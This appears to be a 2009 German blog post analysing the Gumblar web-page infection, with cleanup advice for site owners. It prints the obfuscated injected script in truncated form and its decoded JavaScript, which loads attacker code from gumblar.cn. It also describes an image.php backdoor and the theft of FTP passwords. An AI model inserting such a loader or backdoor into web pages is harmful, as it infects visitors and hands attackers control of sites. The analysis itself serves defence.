Zur Zeit werden wieder viele gehostete Seiten mit Schadcode infiziert. Betroffen sind Seiten mit den Endungen html, js und index*.php sowie Verzeichnisse mit dem Namen "image".
Eingefügt wird Code von der Art
<!--
(function(){var RGzsR="%";var nvYzk="var`20`61`3d`22ScriptEngine`22`2cb`3d`22
... ape(Lvd6z);eval(pe6J)})();
-->
decodiert ergibt das folgendes js-Coding:
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)
&&(typeof(zrvzts)!=typeof("A")))
{ zrvzts="A"; eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.write("<script src=//gumblar.cn/rss/id="+j+">");
Es soll offensichtlich über den Link gumblar.cn/rss/id=2 und id=3 eine Browserlücke ausgenutzt werden, um den Rechner zu infizieren. Bei id=3 wird ein Flush File (gdcwh.swf) heruntergeladen, das wohl einen Exploit erzeugt. Bei id=2 wird der Acrobat Reader angegriffen.
In image-Verzeichnissen wird ein Backdoor-File "image.php" angelegt, das über einen Post mit dem Parameter "e" Schadcode zum Ausführen erhalten kann. Hiermit erhält der Angreifer die Möglichkeit, weitere Manipulationen an gehosteten Files vorzunehmen.
In verschiedenen Foren wird berichtet, dass auch nach Änderung des FTP-Passwords eine erneute Infektion der Sourcen auftritt. Ein Keylogger, der die Passwortänderung hätte weitergeben können, haben die Autoren auf ihrem Computer nicht gefunden. Es deutet alles darauf hin, dass nach der Infektion des Rechners FTP-Passwörter ausgespäht werden. Das geschieht so effektiv, dass auch Änderungen des Passworts nichts helfen, weil diese bei der nächsten FTP-Verbindung wieder an die Hacker übermittelt werden.
Versuche, das Problem zu beseitigen:
- Zuerst eigenen Rechner säubern. Obwohl MalwareBytes und McAfee nichts finden, funktioniert z.B. "Start->Run Program: cmd" nicht. Das ist ein Zeichen, dass der Rechner von Malware gekapert ist. Einen geeigneten Wiederherstellungspunkt suchen und Rechner damit neu aufsetzen.
- Nach dem Säubern der Files auf dem Webserver muss der FTP und SSH-Zugang deaktiviert werden. Dies geschieht über ein Browserfrontend, das der Hoster zur Verfügung stellt.
- Änderung des FTP-Passworts von einem anderen Rechner aus.
- Wichtig: Keine Passwörter im FTP-Programm speichern, sondern bei jedem Connect neu eingeben. FTP-Zugang dazu nur kurz aktivieren. Der Trojaner liest vermutlich die Registry und übermittelt die Verbindungsdaten.
- Domain täglich überwachen, ob ein erneuter Angriff stattgefunden hat. Momentan versucht gumblar, an möglichst viele FTP-Verbindungsdaten zu kommen. Bei infizierten Rechnern wird das Cookie "miek=1" gesetzt.
- Acrobat Reader auf Version 9.1.1 updaten!
Aktuelle Infos gibt es unter http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/comment-page-1/
Über die Absichten der Malware wird unter http://www.handelsblatt.com/technologie/it-internet/trojaner-faelscht-google-ergebnisse;2277404 spekuliert.
Weiter Links: